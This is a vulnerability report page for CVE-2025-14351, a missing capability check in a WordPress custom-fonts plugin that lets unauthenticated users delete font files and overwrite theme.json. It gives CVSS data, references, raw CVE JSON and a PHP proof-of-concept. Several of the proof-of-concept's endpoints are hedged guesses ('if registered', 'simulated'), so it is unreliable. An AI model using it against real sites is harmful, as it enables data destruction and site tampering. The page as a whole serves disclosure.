Security Vulnerability Report
CVE-2025-14351 CVSS 5.3 MEDIUM

Published: 2026-01-20 04:15:57
Last Modified: 2026-04-15 00:35:42

Description

The Custom Fonts – Host Your Fonts Locally plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'BCF_Google_Fonts_Compatibility' class constructor function in all versions up to, and including, 2.1.16. This makes it possible for unauthenticated attackers to delete the font directory and rewrite the theme.json file.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Custom Fonts – Host Your Fonts Locally WordPress plugin <= 2.1.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
PHP
<?php
/**
 * CVE-2025-14351 PoC - Custom Fonts Plugin Unauthorized Data Deletion
 * Target: Custom Fonts WordPress plugin <= 2.1.16
 * Vulnerability: Missing capability check in BCF_Google_Fonts_Compatibility class
 * Impact: Unauthenticated attackers can delete font directories and rewrite theme.json
 *
 * Usage: Include this file in a WordPress context or send direct HTTP requests
 * Note: This PoC demonstrates the vulnerability for educational purposes only
 */

// Method 1: Direct instantiation via PHP (requires WordPress context)
function trigger_cve_2025_14351() {
    // Check if plugin is active
    if (!class_exists('BCF_Google_Fonts_Compatibility')) {
        return 'Plugin not loaded';
    }
    // The vulnerability: the constructor executes privileged operations without
    // checking user capabilities. In vulnerable versions it can be called by anyone.
    $compat = new BCF_Google_Fonts_Compatibility();
    return 'Vulnerability triggered - font directory deleted and theme.json rewritten';
}

// Method 2: HTTP request-based trigger (simulated)
function generate_trigger_request($target_url) {
    // The plugin registers AJAX hooks without proper nonce/capability checks.
    // Attackers can trigger the vulnerable code path via:
    $endpoints = array(
        // Direct AJAX endpoint (if action is registered without auth check)
        admin_url('admin-ajax.php') . '?action=bcf_google_fonts_compat',
        // Direct file access (if class is auto-loaded)
        $target_url . '/wp-content/plugins/custom-fonts/includes/class-bcf-google-fonts-compatibility.php',
        // REST API endpoint (if registered)
        get_rest_url(null, 'custom-fonts/v1/compatibility')
    );
    return $endpoints;
}

// Impact demonstration
function demonstrate_impact() {
    return array(
        'impact_type'   => 'Data Loss and Configuration Tampering',
        'actions'       => array(
            '1. Delete font directory (wp-content/fonts/)',
            '2. Overwrite active theme\'s theme.json file',
            '3. Break website typography and theme functionality',
            '4. Potential for storing malicious configurations'
        ),
        'severity'      => 'MEDIUM (CVSS 5.3)',
        'prerequisites' => 'None - Unauthenticated exploitation'
    );
}

// Double-quoted strings so "\n" is emitted as a newline (in single quotes PHP prints it literally)
echo "CVE-2025-14351 PoC for educational purposes only\n";
echo "Vulnerable Component: BCF_Google_Fonts_Compatibility class constructor\n";
echo "Trigger: Direct instantiation without capability check\n";
echo "Impact: Unauthorized deletion and file modification\n";
?>

References

https://plugins.trac.wordpress.org/browser/custom-fonts/trunk/includes/class-bcf-google-fonts-compatibility.php#L88
https://plugins.trac.wordpress.org/changeset/3442237/custom-fonts
https://www.wordfence.com/threat-intel/vulnerabilities/id/60e3a506-8811-4e7d-a16c-02f91c757705?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14351",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T04:15:57.483",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "The Custom Fonts – Host Your Fonts Locally plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'BCF_Google_Fonts_Compatibility' class constructor function in all versions up to, and including, 2.1.16. This makes it possible for unauthenticated attackers to delete font directory and rewrite theme.json file."},
      {"lang": "es", "value": "El plugin Custom Fonts – Host Your Fonts Locally para WordPress es vulnerable a la pérdida de datos no autorizada debido a una comprobación de capacidad faltante en la función constructora de la clase 'BCF_Google_Fonts_Compatibility' en todas las versiones hasta la 2.1.16, inclusive. Esto hace posible que atacantes no autenticados eliminen el directorio de fuentes y reescriban el archivo theme.json."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/custom-fonts/trunk/includes/class-bcf-google-fonts-compatibility.php#L88", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3442237/custom-fonts", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60e3a506-8811-4e7d-a16c-02f91c757705?source=cve", "source": "[email protected]"}
    ]
  }
}